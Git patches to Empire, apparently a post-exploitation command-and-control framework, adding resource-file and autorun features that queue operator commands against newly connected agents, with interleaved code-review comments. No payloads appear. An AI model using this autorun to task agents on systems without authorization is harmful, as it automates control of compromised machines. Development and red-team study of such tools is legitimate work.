From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 15:53:32 -0600 Subject: [PATCH 04/15] added resource file functionality as in Metasploit --- lib/common/empire.py | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/lib/common/empire.py b/lib/common/empire.py index 4584aba..da7a7af 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -956,6 +956,10 @@ class AgentsMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." @@ -1618,6 +1622,10 @@ class PowerShellAgentMenu(cmd.Cmd): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Task agent to exit." @@ -2419,6 +2427,10 @@ class PythonAgentMenu(cmd.Cmd): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Task agent to exit." @@ -2892,6 +2904,10 @@ class ListenersMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." @@ -3109,6 +3125,10 @@ class ListenerMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." 
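Review bot: The `do_resource` added to AgentsMenu, PowerShellAgentMenu, PythonAgentMenu, ListenersMenu and ListenerMenu here (and to ModuleMenu and StagerMenu on L16) is a verbatim copy of the MainMenu implementation operating on `self.mainMenu.resourceQueue`, so every fix to file handling or queue semantics now has to be made eight times. Each copy can be a one-line delegation, `self.mainMenu.do_resource(arg)`, and the docstring then lives in one place. As written, each copy also replaces the queue with `self.mainMenu.resourceQueue = []`, so a `resource` line encountered while a resource file is already running drops the remaining queued commands.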
@@ -3359,6 +3379,10 @@ class ModuleMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." @@ -3735,6 +3759,10 @@ class StagerMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." From 16267f983c2a7f12364f500f744f7acf34e17461 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 16:29:51 -0600 Subject: [PATCH 05/15] removed debug statements --- lib/common/empire.py | 4 ---- 1 file changed, 4 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index da7a7af..3dee134 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -2890,10 +2890,8 @@ class ListenersMenu(cmd.Cmd): raise NavMain() def postcmd(self, stop, line): - print "in postcmd listeners" if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - print 6 def do_agents(self, line): "Jump to the Agents menu." @@ -3836,7 +3834,6 @@ class StagerMenu(cmd.Cmd): def do_generate(self, line): "Generate/execute the given Empire stager." - if not self.validate_options(): return @@ -3867,7 +3864,6 @@ class StagerMenu(cmd.Cmd): os.chmod(savePath, 777) print "\n" + helpers.color("[*] Stager output written out to: %s\n" % (savePath)) - else: print stagerOutput From 7f4988e951d2f89f842c2a514555e2afc80dd789 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 21:28:45 -0600 Subject: [PATCH 06/15] added help text for resource command --- lib/common/empire.py | 8 ++++++++ 1 file changed, 8 insertions(+) 
diff --git a/lib/common/empire.py b/lib/common/empire.py index 3dee134..ec08771 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -391,6 +391,7 @@ class MainMenu(cmd.Cmd): pass def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.resourceQueue = [] with open(arg) as f: self.resourceQueue.extend(f.read().splitlines()) @@ -957,6 +958,7 @@ class AgentsMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -1623,6 +1625,7 @@ class PowerShellAgentMenu(cmd.Cmd): messages.display_agent(agent) def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -2428,6 +2431,7 @@ class PythonAgentMenu(cmd.Cmd): messages.display_agent(agent) def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -2903,6 +2907,7 @@ class ListenersMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -3124,6 +3129,7 @@ class ListenerMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) 
@@ -3378,6 +3384,7 @@ class ModuleMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -3758,6 +3765,7 @@ class StagerMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) From 8a1d076d14fdfeca1d1a9705d9c6b07fd95f3cbe Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Fri, 13 Oct 2017 10:31:35 -0600 Subject: [PATCH 07/15] refactoring submenu's to not duplicate so much code --- lib/common/empire.py | 434 ++++++------------------------------------- 1 file changed, 56 insertions(+), 378 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index ec08771..0344f70 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -229,11 +229,6 @@ class MainMenu(cmd.Cmd): print helpers.color("[!] Please run database_setup.py") sys.exit() - - # def preloop(self): - # traceback.print_stack() - - def cmdloop(self): """ The main cmdloop logic that handles navigation to other menus. 
@@ -899,38 +894,13 @@ class MainMenu(cmd.Cmd): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in options if s.startswith(mline)] - -class AgentsMenu(cmd.Cmd): - """ - The main class used by Empire to drive the 'agents' menu. - """ +class SubMenu(cmd.Cmd): + def __init__(self, mainMenu): cmd.Cmd.__init__(self) - self.mainMenu = mainMenu - self.doc_header = 'Commands' - - # set the prompt text - self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > ' - - messages.display_agents(self.mainMenu.agents.get_agents_db()) - - # def preloop(self): - # traceback.print_stack() - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) @@ -940,19 +910,19 @@ class AgentsMenu(cmd.Cmd): pass def postcmd(self, stop, line): + if line == "back": + return True if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_back(self, line): - "Go back to the main menu." - raise NavMain() - + "Go back a menu." + return True def do_listeners(self, line): "Jump to the listeners menu." raise NavListeners() - def do_main(self, line): "Go back to the main menu." raise NavMain() 
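Review bot: SubMenu.postcmd, new in this hunk, returns None unless the line is exactly "back", so the `stop` value returned by the command it just ran is discarded and only the string comparison can end the loop; a `do_*` that returns True for any other reason, or "back" typed with surrounding whitespace, does not stop it. cmd.Cmd.postcmd returns `stop`, and SubMenu.do_back already returns True, so the check can be keyed on the value instead of the text: `if stop: return stop` in place of `if line == "back": return True` (keeping the early return so a queued command is not popped into a menu that is about to exit), and `return stop` as the last line. MainMenu.postcmd in the patch-10 hunk at @@ -377,10 +386,9 and the revised SubMenu.postcmd at @@ -904,18 +910,22 drop `stop` in the same way. SubMenu also has no class docstring; `"""Base class for Empire's sub-menus: navigation commands, resource-queue handling and the shared help formatter."""` would cover what the hunk shows.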
@@ -967,6 +937,41 @@ class AgentsMenu(cmd.Cmd): "Exit Empire." raise KeyboardInterrupt + def do_creds(self, line): + "Display/return credentials from the database." + self.mainMenu.do_creds(line) + + # print a nicely formatted help menu + # stolen/adapted from recon-ng + def print_topics(self, header, commands, cmdlen, maxcol): + if commands: + self.stdout.write("%s\n" % str(header)) + if self.ruler: + self.stdout.write("%s\n" % str(self.ruler * len(header))) + for command in commands: + self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) + self.stdout.write("\n") + + # def preloop(self): + # traceback.print_stack() + +class AgentsMenu(SubMenu): + """ + The main class used by Empire to drive the 'agents' menu. + """ + def __init__(self, mainMenu): + SubMenu.__init__(self, mainMenu) + + self.doc_header = 'Commands' + + # set the prompt text + self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > ' + + messages.display_agents(self.mainMenu.agents.get_agents_db()) + + def do_back(self, line): + "Go back to the main menu." + raise NavMain() def do_list(self, line): "Lists all active agents (or listeners)." @@ -978,7 +983,6 @@ class AgentsMenu(cmd.Cmd): else: self.mainMenu.do_list("agents " + str(line)) - def do_rename(self, line): "Rename a particular agent." @@ -1035,12 +1039,6 @@ class AgentsMenu(cmd.Cmd): except KeyboardInterrupt: print '' - - def do_creds(self, line): - "Display/return credentials from the database." - self.mainMenu.do_creds(line) - - def do_clear(self, line): "Clear one or more agent's taskings." @@ -1434,7 +1432,7 @@ class AgentsMenu(cmd.Cmd): return self.mainMenu.complete_creds(text, line, begidx, endidx) -class AgentMenu(cmd.Cmd): +class AgentMenu(SubMenu): """ An abstracted class used by Empire to determine which agent menu type to instantiate. 
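Review bot: print_topics, now the shared help formatter for every submenu, writes `getattr(self, 'do_' + command).__doc__` straight into the help table, so a `do_*` without a docstring shows up as the word "None"; `(getattr(self, 'do_' + command).__doc__ or '')` keeps the column blank instead. The code is moved rather than new, but it now applies to every subclass of SubMenu, so each menu's help output depends on every command carrying a docstring. AgentsMenu.do_back in this hunk overrides SubMenu.do_back to raise NavMain rather than return True; a one-line comment there, `# 'agents' is a top-level menu: leave via NavMain rather than via stop`, would explain why the two differ.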
@@ -1452,15 +1450,14 @@ class AgentMenu(cmd.Cmd): else: print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) -class PowerShellAgentMenu(cmd.Cmd): +class PowerShellAgentMenu(SubMenu): """ The main class used by Empire to drive an individual 'agent' menu. """ def __init__(self, mainMenu, sessionID): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) - self.mainMenu = mainMenu self.sessionID = sessionID self.doc_header = 'Agent Commands' @@ -1482,11 +1479,6 @@ class PowerShellAgentMenu(cmd.Cmd): # listen for messages from this specific agent dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any) - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - # def preloop(self): # traceback.print_stack() @@ -1520,23 +1512,6 @@ class PowerShellAgentMenu(cmd.Cmd): if (str(self.sessionID) in signal) or (str(name) in signal): print helpers.color(signal) - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def default(self, line): "Default handler" 
@@ -1556,30 +1531,6 @@ class PowerShellAgentMenu(cmd.Cmd): print helpers.color("[!] Command not recognized.") print helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands.") - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_help(self, *args): "Displays the help menu or syntax for particular commands." @@ -1587,8 +1538,7 @@ class PowerShellAgentMenu(cmd.Cmd): print "\n" + helpers.color("[*] Available opsec-safe agent commands:\n") print " " + messages.wrap_columns(", ".join(self.agentCommands), ' ', width1=50, width2=10, indent=5) + "\n" else: - cmd.Cmd.do_help(self, *args) - + SubMenu.do_help(self, *args) def do_list(self, line): "Lists all active agents (or listeners)." @@ -1600,7 +1550,6 @@ class PowerShellAgentMenu(cmd.Cmd): else: print helpers.color("[!] Please use 'list [agents/listeners] '.") - def do_rename(self, line): "Rename the agent." @@ -1616,7 +1565,6 @@ class PowerShellAgentMenu(cmd.Cmd): else: print helpers.color("[!] Please enter a new name for the agent") - def do_info(self, line): "Display information about this agent" @@ -1624,12 +1572,6 @@ class PowerShellAgentMenu(cmd.Cmd): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - def do_exit(self, line): "Task agent to exit." 
@@ -2293,13 +2235,11 @@ class PowerShellAgentMenu(cmd.Cmd): return self.mainMenu.complete_creds(text, line, begidx, endidx) -class PythonAgentMenu(cmd.Cmd): +class PythonAgentMenu(SubMenu): def __init__(self, mainMenu, sessionID): - cmd.Cmd.__init__(self) - - self.mainMenu = mainMenu + SubMenu.__init__(self, mainMenu) self.sessionID = sessionID @@ -2320,13 +2260,6 @@ class PythonAgentMenu(cmd.Cmd): if results: print "\n" + results.rstrip('\r\n') - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - # def preloop(self): - # traceback.print_stack() - def handle_agent_event(self, signal, sender): """ Handle agent event signals. 
@@ -2346,54 +2279,13 @@ class PythonAgentMenu(cmd.Cmd): if (str(self.sessionID) in signal) or (str(name) in signal): print helpers.color(signal) - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, cmds, cmdlen, maxcol): - if cmds: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for c in cmds: - self.stdout.write("%s %s\n" % (c.ljust(17), getattr(self, 'do_' + c).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def default(self, line): "Default handler" print helpers.color("[!] Command not recognized, use 'help' to see available commands") - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_help(self, *args): "Displays the help menu or syntax for particular commands." - cmd.Cmd.do_help(self, *args) + SubMenu.do_help(self, *args) def do_list(self, line): @@ -2848,14 +2740,12 @@ class PythonAgentMenu(cmd.Cmd): # return helpers.complete_path(text,line) -class ListenersMenu(cmd.Cmd): +class ListenersMenu(SubMenu): """ The main class used by Empire to drive the 'listener' menu. """ def __init__(self, mainMenu): - cmd.Cmd.__init__(self) - - self.mainMenu = mainMenu + SubMenu.__init__(self, mainMenu) self.doc_header = 'Listener Commands' 
@@ -2865,58 +2755,10 @@ class ListenersMenu(cmd.Cmd): # display all active listeners on menu startup messages.display_active_listeners(self.mainMenu.listeners.activeListeners) - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - - # def preloop(self): - # traceback.print_stack() - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def do_back(self, line): "Go back to the main menu." raise NavMain() - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_list(self, line): "List all active listeners (or agents)." 
@@ -3074,13 +2916,11 @@ class ListenersMenu(cmd.Cmd): return [s[offs:] for s in names if s.startswith(mline)] -class ListenerMenu(cmd.Cmd): +class ListenerMenu(SubMenu): def __init__(self, mainMenu, listenerName): - cmd.Cmd.__init__(self) - - self.mainMenu = mainMenu + SubMenu.__init__(self, mainMenu) if listenerName not in self.mainMenu.listeners.loadedListeners: print helpers.color("[!] Listener '%s' not currently valid!" % (listenerName)) @@ -3094,51 +2934,6 @@ class ListenerMenu(cmd.Cmd): # set the text prompt self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > ' - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - - def emptyline(self): - """ - If any empty line is entered, do nothing. - """ - pass - - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_info(self, line): "Display listener module options." messages.display_listener_module(self.listener) 
@@ -3263,15 +3058,14 @@ class ListenerMenu(cmd.Cmd): return [s[offs:] for s in languages if s.startswith(mline)] -class ModuleMenu(cmd.Cmd): +class ModuleMenu(SubMenu): """ The main class used by Empire to drive the 'module' menu. """ def __init__(self, mainMenu, moduleName, agent=None): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) self.doc_header = 'Module Commands' - self.mainMenu = mainMenu try: # get the current module/name @@ -3290,14 +3084,6 @@ class ModuleMenu(cmd.Cmd): except Exception as e: print helpers.color("[!] ModuleMenu() init error: %s" % (e)) - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - - # def preloop(self): - # traceback.print_stack() - def validate_options(self): "Ensure all required module options are completed." 
@@ -3344,56 +3130,6 @@ class ModuleMenu(cmd.Cmd): return True - - def emptyline(self): - pass - - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_list(self, line): "Lists all active agents (or listeners)." @@ -3404,7 +3140,6 @@ class ModuleMenu(cmd.Cmd): else: print helpers.color("[!] Please use 'list [agents/listeners] '.") - def do_reload(self, line): "Reload the current module." 
@@ -3681,16 +3416,14 @@ class ModuleMenu(cmd.Cmd): return [s[offs:] for s in names if s.startswith(mline)] -class StagerMenu(cmd.Cmd): +class StagerMenu(SubMenu): """ The main class used by Empire to drive the 'stager' menu. """ def __init__(self, mainMenu, stagerName, listener=None): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) self.doc_header = 'Stager Menu' - self.mainMenu = mainMenu - # get the current stager name self.stagerName = stagerName self.stager = self.mainMenu.stagers.stagers[stagerName] @@ -3704,11 +3437,6 @@ class StagerMenu(cmd.Cmd): listener = self.mainMenu.listeners.get_listener(listener) self.stager.options['Listener']['Value'] = listener - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - def validate_options(self): "Make sure all required stager options are completed." 
@@ -3725,56 +3453,6 @@ class StagerMenu(cmd.Cmd): return True - - def emptyline(self): - pass - - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_list(self, line): "Lists all active agents (or listeners)." From 0485b2b6fdbd4652b9d5730bb9fc9a060cc2bbd8 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Fri, 13 Oct 2017 10:45:55 -0600 Subject: [PATCH 08/15] can call agents from any submenu now --- lib/common/empire.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/lib/common/empire.py b/lib/common/empire.py index c34eed6..91b843a 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py 
@@ -925,6 +925,10 @@ class SubMenu(cmd.Cmd): "Jump to the listeners menu." raise NavListeners() + def do_agents(self, line): + "Jump to the agents menu." + raise NavAgents() + def do_main(self, line): "Go back to the main menu." raise NavMain() From 23de7bc71ac0581aaba2dd23f2df42cc9793e015 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Fri, 13 Oct 2017 21:13:25 -0600 Subject: [PATCH 09/15] removing duplicate method --- lib/common/empire.py | 5 ----- 1 file changed, 5 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 91b843a..b2b5090 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -2328,11 +2328,6 @@ class PythonAgentMenu(SubMenu): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Task agent to exit." From 69dbc89422056203b940327b40034103e8158454 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Mon, 16 Oct 2017 09:55:48 -0600 Subject: [PATCH 10/15] add autorun feature to agents menu to run all commands in a resource file on incoming agents --- empire | 1 + lib/common/agents.py | 16 ++++++++- lib/common/empire.py | 81 ++++++++++++++++++++++++++++++-------------- 3 files changed, 72 insertions(+), 26 deletions(-) diff --git a/empire b/empire index 3d5d6dd..65a59d1 100755 --- a/empire +++ b/empire 
@@ -1239,6 +1239,7 @@ if __name__ == '__main__': generalGroup = parser.add_argument_group('General Options') generalGroup.add_argument('--debug', nargs='?', const='1', help='Debug level for output (default of 1, 2 for msg display).') generalGroup.add_argument('-v', '--version', action='store_true', help='Display current Empire version.') + generalGroup.add_argument('-r','--resource', nargs=1, help='Run the Empire commands in the specified resource file after startup.') cliGroup = parser.add_argument_group('CLI Payload Options') cliGroup.add_argument('-l', '--listener', nargs='?', const="list", help='Display listener options. Displays all listeners if nothing is specified.') diff --git a/lib/common/agents.py b/lib/common/agents.py index 505a858..351d162 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1343,6 +1343,20 @@ class Agents: if autorun and autorun[0] != '' and autorun[1] != '': self.add_agent_task_db(sessionID, autorun[0], autorun[1]) + if len(self.mainMenu.autoRuns) > 0: + autorunCmds = ["interact %s" % sessionID] + autorunCmds.extend(self.mainMenu.autoRuns) + autorunCmds.extend(["lastautoruncmd"]) + self.mainMenu.resourceQueue.extend(autorunCmds) + try: + #this will cause the cmdloop() to start processing the autoruns + self.mainMenu.do_agents("kickit") + except Exception as e: + if e.message == "endautorun": + pass + else: + raise e + return "STAGE2: %s" % (sessionID) else: @@ -1399,7 +1413,6 @@ class Agents: TODO: does this need self.lock? """ - if sessionID not in self.agents: dispatcher.send("[!] handle_agent_request(): sessionID %s not present" % (sessionID), sender='Agents') return None @@ -1417,6 +1430,7 @@ class Agents: # build tasking packets for everything we have for tasking in taskings: task_name, task_data, res_id = tasking + all_task_packets += packets.build_task_packet(task_name, task_data, res_id) # get the session key for the agent diff --git a/lib/common/empire.py b/lib/common/empire.py index b2b5090..1ff1ccb 100644 
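Review bot: The autorun hook in the agents.py hunk at @@ -1343 uses a plain `Exception("endautorun")` as control flow and recognises it with `e.message == "endautorun"`: `e.message` exists only in Python 2, any other exception raised while the queued autorun commands run propagates out of the staging code path, and one that merely carries that text is swallowed. A dedicated exception class, e.g. `class EndAutorun(Exception): pass` defined where both files can import it, raised from SubMenu.postcmd (patch-10 hunk at @@ -904,18 +910,22) and caught here with `except EndAutorun: pass`, makes the intent explicit and robust. `self.mainMenu.do_agents("kickit")` also starts a nested interactive cmdloop from inside the staging handler; if that handler runs on a listener thread rather than the console thread (not visible here), it would read stdin concurrently with the operator's main loop, so consider only appending to resourceQueue and letting the console loop's postcmd drain it. The autorun commands are appended to the tail of the shared resourceQueue, so when an operator's resource file is still being processed the `interact` line and the sentinel can be interleaved with its remaining commands. The enclosing method starts before this hunk.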
